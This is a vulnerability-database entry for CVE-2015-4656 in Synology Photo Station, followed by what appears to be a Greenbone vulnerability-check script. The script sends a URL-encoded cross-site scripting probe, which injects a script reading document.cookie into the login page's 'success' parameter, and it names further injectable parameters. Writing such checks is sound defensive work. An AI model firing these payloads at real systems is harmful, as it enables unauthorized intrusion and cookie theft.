4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
68.0%
Synology Photo Station is prone to a command
injection vulnerability and multiple cross-site scripting vulnerabilities
because it fails to sanitize user-supplied input.
# SPDX-FileCopyrightText: 2015 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:synology:synology_photo_station";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.105280");
script_cve_id("CVE-2015-4656");
script_version("2023-10-27T05:05:28+0000");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_name("Synology Photo Station Command Injection and multiple Cross Site Scripting Vulnerabilities");
script_xref(name:"URL", value:"https://www.securify.nl/advisory/SFY20150504/synology_photo_station_multiple_cross_site_scripting_vulnerabilities.html");
script_xref(name:"URL", value:"https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html");
script_tag(name:"insight", value:"Multiple errors exist due to insufficient
validation of input passed via 'success' parameter to login.php script, 't'
parameter to /photo/index.php script and 'description' POST parameter to
photo.php script.");
script_tag(name:"impact", value:"An attacker may leverage the XSS issues to
execute arbitrary script code in the browser of an unsuspecting user in the context
of the affectedasite. This may allow the attacker to steal cookie-based
authentication credentials and launch other attacks.
The Command Injection vulnerability allows an attacker to execute arbitrary commands
with the privileges of the webserver. An attacker can use this vulnerability to
compromise a Synology DiskStation NAS, including all data stored on the NAS.");
script_tag(name:"vuldetect", value:"Send a crafted http GET request and check if it
is possible to read cookie or not.");
script_tag(name:"solution", value:"Update to 6.3-2945 or newer.");
script_tag(name:"summary", value:"Synology Photo Station is prone to a command
injection vulnerability and multiple cross-site scripting vulnerabilities
because it fails to sanitize user-supplied input.");
script_tag(name:"affected", value:"Photo Station 6 < 6.3-2945");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
script_tag(name:"creation_date", value:"2015-05-26 14:30:57 +0200 (Tue, 26 May 2015)");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2015 Greenbone AG");
script_dependencies("gb_synology_photo_station_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("synology_photo_station/installed");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
if(!photoPort = get_app_port(cpe:CPE)){
exit(0);
}
if(!dir = get_app_location(cpe:CPE, port:photoPort)){
exit(0);
}
url = dir + "/m/login.php?success=%3E%3Cscript%3Ealert%28documen" +
"t.cookie%29%3C/script%3E";
if(http_vuln_check(port:photoPort, url:url, pattern:"<script>alert\(document.cookie\)</script>",
extra_check: make_list(">Photo Station<", ">Synology"), check_header:TRUE))
{
report = http_report_vuln_url( port:photoPort, url:url );
security_message(port:photoPort, data:report);
exit(0);
}
exit(99);